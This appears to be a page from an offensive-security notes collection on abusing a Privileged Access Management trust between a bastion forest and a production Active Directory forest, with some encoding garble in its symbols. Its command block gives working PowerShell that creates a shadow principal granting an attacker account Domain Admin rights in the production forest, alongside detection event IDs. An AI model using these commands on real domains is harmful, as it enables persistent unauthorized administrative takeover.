attack-71-pam-trust-abuse-bastion-forest.md (3369B)
1 --- 2 title: "Attack #71 โ PAM Trust Abuse (Bastion Forest)" 3 description: "Get-ADTrust -Filter {TrustType -eq \"ForestTransitive\"} | Where ForestTransitive -eq $true netdom trust corp.local /domain:bastion.local /verify" 4 category: active-directory 5 subcategory: "Trust Abuse" 6 tags: ["active-directory", "privilege-escalation"] 7 tools: ["PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/๐ถ Attack #71 โ PAM Trust Abuse (Bastion Forest).md" 11 --- 12 # ๐ถ Attack #71 โ PAM Trust Abuse (Bastion Forest) 13 14 *** 15 16 ## ๐ How It Works 17 18 **Privileged Access Management (PAM) trust** is a special forest trust type introduced in Server 2016 for **bastion forest** architectures. It enables time-limited group memberships via "shadow principals" โ users in the bastion forest get temporary membership in privileged groups of the production forest. If the bastion forest is compromised, or if the PAM trust is misconfigured, an attacker can abuse shadow principals to gain persistent, time-unlimited admin access to the production forest. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **PAM trust exists** | Between production and bastion forest | 27 | **Compromise bastion forest** | Or misconfigured PAM trust | 28 29 *** 30 31 ## ๐ป Full Commands 32 33 ```powershell 34 # โโ Enumerate PAM trust โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 35 Get-ADTrust -Filter {TrustType -eq "ForestTransitive"} | Where ForestTransitive -eq $true 36 netdom trust corp.local /domain:bastion.local /verify 37 38 # โโ Find shadow principals โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 39 Get-ADObject -SearchBase "CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" \ 40 -Filter * -Properties * 41 42 # โโ If bastion is compromised โ create shadow principal mapping โโโโโโโโโโโโโโ 43 # From bastion forest as DA: 44 New-ADObject -Type "msDS-ShadowPrincipal" -Name "shadow-DA" \ 45 -Path "CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" \ 46 -OtherAttributes @{ 47 'msDS-ShadowPrincipalSid' = (Get-ADGroup "Domain Admins" -Server corp.local).SID 48 'member' = (Get-ADUser attacker -Server bastion.local).DistinguishedName 49 } 50 # attacker in bastion forest now has DA rights in corp.local production forest 51 ``` 52 53 *** 54 55 ## ๐ก๏ธ Detection โ Event IDs 56 57 | Event ID | Source | What to Look For | 58 |---|---|---| 59 | **4624** | Security Log | Authentication via PAM trust from bastion forest | 60 | **5136** | Security Log | Shadow principal creation/modification | 61 62 *** 63 64 ## ๐ Attack Chain Context 65 66 ``` 67 [PAM Trust] โโโ Bastion Forest Compromise โ Production Forest Admin 68 โ 69 โโโโ โ ๏ธ Rare โ only exists in environments with Server 2016+ bastion forests 70 โโโโ ๐ Shadow principals = temporary group membership across trusts 71 โโโโ ๐ Defeated by: harden bastion forest, monitor shadow principal changes 72 ``` 73 74 *** 75 76 > โ **Attack #71 โ PAM Trust Abuse complete.** 77 78 *** 79 80 > ๐ **Category 9 โ Trust & Forest Attacks is now COMPLETE (4/4 attacks).**